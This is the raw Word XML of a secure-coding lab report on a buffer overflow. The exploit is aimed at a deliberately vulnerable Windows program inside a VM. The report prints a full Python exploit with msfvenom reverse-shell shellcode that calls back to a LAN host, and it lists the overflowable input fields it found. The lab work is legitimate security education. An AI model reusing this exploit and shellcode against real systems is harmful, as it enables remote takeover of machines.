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18AE1B" w14:textId="77777777" w:rsidR="001F5D08" w:rsidRPr="009D4A1A" w:rsidRDefault="001F5D08" w:rsidP="001F5D08">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D4A1A">
        <w:rPr>
          <w:b/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>CSE 2010 SECURE CODING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200465C8" w14:textId="24865DDA" w:rsidR="002D0F8C" w:rsidRDefault="002D0F8C" w:rsidP="002D0F8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LAB SLOT –L23+L24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CB372E" w14:textId="15FC1561" w:rsidR="002D0F8C" w:rsidRDefault="002D0F8C" w:rsidP="002D0F8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NAME- K V P S GANESH M</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76AEDD1B" w14:textId="6FE199FF" w:rsidR="001F5D08" w:rsidRPr="009D4A1A" w:rsidRDefault="002D0F8C" w:rsidP="002D0F8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REGISTRATION NUMBER-19BCN7073</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="2D6551A4" w14:textId="6409A5E4" w:rsidR="001F5D08" w:rsidRDefault="001F5D08" w:rsidP="001F5D0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LAB EXPERIMENT 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492D56AF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27F52FE1" w14:textId="5AC16ADC" w:rsidR="004B7776" w:rsidRDefault="004B777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Task </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58753730" w14:textId="76A37ABF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Download Vulln.zip from teams.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FEBDE9D" w14:textId="1104A4CE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 xml:space="preserve">Deploy a virtual </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004B7776">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>windows</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004B7776">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 7 instance and copy the Vulln.zip into it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A331DC4" w14:textId="2B9C15BC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Unzip the zip file. You will find two files named exploit.py and Vuln_Program_Stream.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F28703B" w14:textId="7FBEA41F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Download and install python 2.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004B7776">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>7.*</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004B7776">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> or 3.5.*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FAB406F" w14:textId="1DFA8B31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Run the exploit script to generate the payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBA8BA0" w14:textId="4EF81E76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Install Vuln_Program_Stream.exe and Run the same</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB5821D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44ACE8CF" w14:textId="69396D1C" w:rsidR="004B7776" w:rsidRDefault="004B777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Analysis </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1BBC2A" w14:textId="47DA8808" w:rsidR="004B7776" w:rsidRDefault="004B7776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Crash</w:t>
      </w:r>
      <w:r w:rsidRPr="004B7776">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004B7776">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Vuln_Program_Stream</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004B7776">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> program and report the vulnerability. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A18349" w14:textId="04F410A6" w:rsidR="004B7776" w:rsidRDefault="004B7776" w:rsidP="004B7776">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="222F5DA3" w14:textId="68BAE320" w:rsidR="004B7776" w:rsidRDefault="004B7776" w:rsidP="004B7776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Happy Learning!!!!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB5CFB3" w14:textId="77777777" w:rsidR="0062691A" w:rsidRDefault="0062691A" w:rsidP="004B7776">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02EDCE90" w14:textId="22A9E302" w:rsidR="0062691A" w:rsidRDefault="0062691A" w:rsidP="004B7776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exploit.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19097440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import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0062691A">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>struct</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1ABD7792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71A0D7FB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428A9E03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Message= - Pattern h1Ah (0x68413168) found in cyclic pattern at position 214</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADCAD3C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lastRenderedPageBreak/>
        <w:t>"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEEAFF6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05E1500E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OFFSET = 214</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC8DAD7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478034F5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1C7C8674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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0062691A">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>badchars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= 'x00x09x0ax0dx3ax5c'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703ED5BF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359AF6C6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14F9E379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51984EC1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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0062691A">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>short_jump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= 'xEBx06x90x90'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B122BFC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632E55A3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0398280F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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0062691A">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>msfvenom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-p windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0062691A">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>shell_reverse_tcp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LHOST=192.168.19.129 LPORT=443 -f python -v shellcode -b "x00x09x0ax0dx3ax5c" EXITFUNC=thread</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4572C1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265055DE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shellcode </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0062691A">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>=  "</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0062691A">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FAF3F2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"xdaxc7xbaxeex50x53xe0xd9x74x24xf4"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206D8400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"x5dx33xc9xb1x52x83xedxfcx31x55x13"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246DBBDC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"x03xbbx43xb1x15xbfx8cxb7xd6x3fx4d"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CCA1D1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"xd8x5fxdax7cxd8x04xafx2fxe8x4fxfd"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65689FEC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"xc3x83x02x15x57xe1x8ax1axd0x4cxed"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CC0822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"x15xe1xfdxcdx34x61xfcx01x96x58xcf"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2360F3AB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"x57xd7x9dx32x95x85x76x38x08x39xf2"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5970AF93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"x74x91xb2x48x98x91x27x18x9bxb0xf6"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530C8D0B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"x12xc2x12xf9xf7x7ex1bxe1x14xbaxd5"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238BB564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"x9axefx30xe4x4ax3exb8x4bxb3x8ex4b"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41BA815D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"x95xf4x29xb4xe0x0cx4ax49xf3xcbx30"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B01A3EE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lastRenderedPageBreak/>
        <w:t>shellcode += "x95x76xcfx93x5ex20x2bx25xb2xb7xb8"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FA9E73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"x29x7fxb3xe6x2dx7ex10x9dx4ax0bx97"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419D9C6F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"x71xdbx4fxbcx55x87x14xddxccx6dxfa"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56873580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"xe2x0excexa3x46x45xe3xb0xfax04x6c"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1C4DEA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"x74x37xb6x6cx12x40xc5x5exbdxfax41"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E5B864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"xd3x36x25x96x14x6dx91x08xebx8exe2"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDF9882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"x01x28xdaxb2x39x99x63x59xb9x26xb6"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BEABEAB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"xcexe9x88x69xafx59x69xdax47xb3x66"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A18150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"x05x77xbcxacx2ex12x47x27x91x4bx54"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59EA8FB6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"x36x79x8ex5ax39xc1x07xbcx53x25x4e"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1698150F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"x17xccxdcxcbxe3x6dx20xc6x8exaexaa"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636C8F0E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"xe5x6fx60x5bx83x63x15xabxdexd9xb0"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B8E52D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"xb4xf4x75x5ex26x93x85x29x5bx0cxd2"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3CC811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"x7exadx45xb6x92x94xffxa4x6ex40xc7"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD3EA0C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"x6cxb5xb1xc6x6dx38x8dxecx7dx84x0e"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C6BF33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"xa9x29x58x59x67x87x1ex33xc9x71xc9"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA1F67E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"xe8x83x15x8cxc2x13x63x91x0exe2x8b"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7A406E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"x20xe7xb3xb4x8dx6fx34xcdxf3x0fxbb"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60066ACA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"x04xb0x30x5ex8cxcdxd8xc7x45x6cx85"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713BB560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"xf7xb0xb3xb0x7bx30x4cx47x63x31x49"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AAA1698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"x03x23xaax23x1cxc6xccx90x1dxc3"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A317C4B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277A1021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payload </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0062691A">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>=  '</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0062691A">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">A' * (OFFSET - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0062691A">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>len</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0062691A">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0062691A">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>short_jump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0062691A">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C99563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payload += </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0062691A">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>short_jump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2074B0D0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payload += 'x90' * 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AFD7BB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payload += shellcode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF3F54D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7D16790A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f = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0062691A">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>open(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0062691A">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>"exploit.txt", "w")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622E6E64" w14:textId="77777777" w:rsidR="0062691A" w:rsidRPr="0062691A" w:rsidRDefault="0062691A" w:rsidP="0062691A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0062691A">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>f.write</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0062691A">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(payload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6B4E5C" w14:textId="2A4DD29D" w:rsidR="0062691A" w:rsidRDefault="0062691A" w:rsidP="0062691A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0062691A">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>f.close</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0062691A">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0695942D" w14:textId="77777777" w:rsidR="0062691A" w:rsidRDefault="0062691A" w:rsidP="0062691A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33622C3C" w14:textId="77777777" w:rsidR="0062691A" w:rsidRPr="004B7776" w:rsidRDefault="0062691A" w:rsidP="0062691A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="685DFB24" w14:textId="78787EC6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41A464F2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398A4A03" w14:textId="2BE606C5" w:rsidR="004B7776" w:rsidRDefault="0062691A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Payload generated:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329E75BB" w14:textId="398DCAB8" w:rsidR="0062691A" w:rsidRDefault="0062691A" w:rsidP="00130FC5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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27434FA5" w14:textId="77777777" w:rsidR="0092704F" w:rsidRDefault="0092704F" w:rsidP="00130FC5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02D8D020" w14:textId="77777777" w:rsidR="0092704F" w:rsidRDefault="0092704F" w:rsidP="00130FC5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52B51B63" w14:textId="77777777" w:rsidR="0092704F" w:rsidRDefault="0092704F" w:rsidP="00130FC5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08E894EA" w14:textId="77777777" w:rsidR="0092704F" w:rsidRDefault="0092704F" w:rsidP="00130FC5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DA5875C" w14:textId="77777777" w:rsidR="0092704F" w:rsidRDefault="0092704F" w:rsidP="00130FC5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51B781BB" w14:textId="5F225710" w:rsidR="0092704F" w:rsidRDefault="0092704F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We can insert the payload generated from the python code and try to check fields which are vulnerable to buffer overflow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1662E91F" w14:textId="6AEF4F21" w:rsidR="0092704F" w:rsidRDefault="0092704F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Here the “Song Pattern</w:t>
      </w:r>
      <w:r w:rsidR="009516A3">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> field and the “Station Pattern” field are vulnerable as when we executed the payload the application crashed.</w:t>
      </w:r>
      <w:r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7DA40793" wp14:editId="31739EB9">
            <wp:extent cx="5686425" cy="4713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55" cy="47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0503FA6" wp14:editId="02F2AF79">
            <wp:extent cx="4943475" cy="406990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915" cy="40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7A02CBE0" wp14:editId="2240434F">
            <wp:extent cx="4884943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87" cy="39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5B38C3B" wp14:editId="42AEF5B6">
            <wp:extent cx="5092253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77" cy="41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6A9D" w14:textId="568B9D25" w:rsidR="0092704F" w:rsidRDefault="0092704F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See here we got a dialog box stating that application stopped </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>working .If</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> we click the </w:t>
      </w:r>
      <w:r w:rsidR="009516A3">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Close window button the application will exit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451878D8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56E0DF98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0BEE9DFE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5C2FCF98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313BEE82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6339C778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3AA6230E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129BAF79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79A77132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27AE8CDE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6E5EE44E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77606366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6AB2C23B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One of the easiest way to exploit an application is the “Search field”. Here also the “Search Text field” is vulnerable to buffer overflow.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F133BB0" w14:textId="66D22F9E" w:rsidR="009516A3" w:rsidRDefault="0092704F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71D43E31" wp14:editId="15BFD505">
            <wp:extent cx="6024601" cy="493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31" cy="49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E2DA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6C7BF6AA" w14:textId="77777777" w:rsidR="009516A3" w:rsidRDefault="009516A3" w:rsidP="00130FC5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C5328F5" w14:textId="0FE59B84" w:rsidR="0092704F" w:rsidRDefault="0092704F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EAF1090" wp14:editId="36D0C9C1">
            <wp:extent cx="5731510" cy="4646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2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E0B3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43628F0E" w14:textId="5B185D4E" w:rsidR="009516A3" w:rsidRDefault="009516A3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So we found three vulnerable fields here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01CAC5F1" w14:textId="3ADA6AB6" w:rsidR="009516A3" w:rsidRDefault="009516A3" w:rsidP="009516A3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Song Pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7FFB5A" w14:textId="20DC6013" w:rsidR="009516A3" w:rsidRDefault="009516A3" w:rsidP="009516A3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Station Pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21284499" w14:textId="7A2A742F" w:rsidR="009516A3" w:rsidRPr="009516A3" w:rsidRDefault="009516A3" w:rsidP="009516A3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Search Text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1A753D" w14:textId="77777777" w:rsidR="004B7776" w:rsidRDefault="004B7776" w:rsidP="00130FC5"/>
    <w:sectPr w:rsidR="004B7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52179"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AB4E82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03358"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="00CE2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25B78"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B7B07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956"/>
    <w:rsid w:val="00130FC5"/>
    <w:rsid w:val="001E3956"/>
    <w:rsid w:val="001F5D08"/>
    <w:rsid w:val="002D0F8C"/>
    <w:rsid w:val="004B7776"/>
    <w:rsid w:val="0062691A"/>
    <w:rsid w:val="0092704F"/>
    <w:rsid w:val="009516A3"/>
    <w:rsid w:val="00A30B65"/>
    <w:rsid w:val="00C54F35"/>
    <w:rsid w:val="00D6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BDB70"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{A353CF44-EE3D-4779-A316-3DC0400AE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7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73CA7B58CB742AE325175108AEBE9" ma:contentTypeVersion="2" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="9a16d019ef6c7478527427960c3ca490">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="01e6aae9-b236-437a-8d13-d697c8e2323c" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="7340df6993f91029a45b926439a71664" ns2:_="">
    <xsd:import namespace="01e6aae9-b236-437a-8d13-d697c8e23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6aae9-b236-437a-8d13-d697c8e23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CC3219-0FDF-445C-A231-AAAB657BE4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EA9882-03D4-47F3-9614-7ECDEB7D2D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6aae9-b236-437a-8d13-d697c8e23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61364B-444B-4963-BAC3-C177D8878E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 Chakkaravarthy</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>L̥</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-06-13T19:54:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-06-13T19:54:00Z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0x01010030773CA7B58CB742AE325175108AEBE9</vt:lpwstr>
  </property>
</Properties>
</file>